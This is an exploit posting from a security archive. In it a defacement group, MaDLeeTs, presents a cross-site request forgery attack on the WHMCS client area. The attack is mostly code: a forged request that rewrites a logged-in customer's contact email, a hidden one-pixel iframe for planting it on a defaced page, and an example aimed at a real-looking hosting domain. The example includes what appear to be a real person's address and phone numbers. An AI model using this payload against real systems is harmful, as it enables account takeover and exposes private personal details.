WHMCS appears to suffer from a cross site request forgery vulnerability.
b5796b396efd0618d69da2887baf2e280c72e6f06191cd17881fdc38654ec207###########################################################################
# Exploit Title: WHMCS [CSRF] All Versions (0day)
# Team: MaDLeeTs
# Software Link: http://www.whmcs.com
# Version: All
# Site: http://www.MaDLeeTs.com
# Email: LeeTHaXor@Y7Mail.com
#######################Video#######################################
http://vimeo.com/63686629
###########################################################################
https://[TARGETS WEBHOST]/clientarea.php?action=details&save=true&firstname=Max&lastname=Fong&companyname=Antswork+Communications+Sdn+Bhd&email=[ YOUR EMAIL ADDRESS ]&address1=B10-12,+Endah+Puri+Condominium,&address2=Jalan+3/149E,+Taman+Seri+Endah+&city=Seri+Petaling&state=Wilayah+Persekutuan&postcode=57000&country=MY&phonenumber=0060390592663&paymentmethod=none&billingcid=0&customfield[1]=max@antswork.com&customfield[2]=&customfield[3]=+6019.3522298&customfield[4]=+603.90578663&customfield[5]=Laura+-+0192182996&customfield[6]=Owner+of+Company&customfield[7]=&customfield[8]=&customfield[9]=Old+Contact+Details:+A2-11-8,+Vista+Komanwel+A2+Bukit+Jalil+57700+Kuala+Lumpur+Tel:+603.86560268+Fax:+603.8?6560768
########################iFrame Code To Add On Deface##############################
<IFRAME src="[Exploit Code]" width="1" height="1" scrolling="auto" frameborder="0"></iframe>
Example:
<IFRAME src="https://manage.fatservers.my/clientarea.php?action=details&save=true&firstname=Max&lastname=Fong&companyname=Antswork+Communications+Sdn+Bhd&email=LeeTHaxor%40Y7Mail.Com&address1=B10-12%2C+Endah+Puri+Condominium%2C&address2=Jalan+3%2F149E%2C+Taman+Seri+Endah+&city=Seri+Petaling&state=Wilayah+Persekutuan&postcode=57000&country=MY&phonenumber=0060390592663&paymentmethod=none&billingcid=0&customfield%5B1%5D=max%40antswork.com&customfield%5B2%5D=&customfield%5B3%5D=%2B6019.3522298&customfield%5B4%5D=%2B603.90578663&customfield%5B5%5D=Laura+-+0192182996&customfield%5B6%5D=Owner+of+Company&customfield%5B7%5D=&customfield%5B8%5D=&customfield%5B9%5D=Old+Contact+Details%3A+A2-11-8%2C+Vista+Komanwel+A2+Bukit+Jalil+57700+Kuala+Lumpur+Tel%3A+603.86560268+Fax%3A?+603.86560768" width="1" height="1" scrolling="auto" frameborder="0"></iframe>
###########################################################################
All you need to do is add it into your Deface page and make your target view the deface page, He MUST loggin 1st into his clientarea in order to get his email updated.
###########################################################################
Greetz to : H4x0rL1f3 | KhantastiC HaXor | H4x0r HuSsY | b0x | Invectus | Shadow008 | Neo HaXor | Hitcher | Dr.Z0mbie | Hmei7 | phpBugz | MindCracker |
c0rrupt | r00x | Pain006 | Ment@l Mind | M4DSh4k | H1d@lG0 | AlphaSky | 3thicaln00b | e0fx | madc0de |
makman | DeaTh AnGeL | Lnxr00t | x3o-1337 | Tor Demon | T4p10N | AL.MaX HaCkEr | | ThaRude | ThaDark |
Evil-DZ | H3ll-dz | Over-X | 3xp1r3 Cyber Army | Pakistan Cyber Army And All MaDLeeTs TeaM Members
###########################################################################
http://www.MaDLeeTs.com
###########################################################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed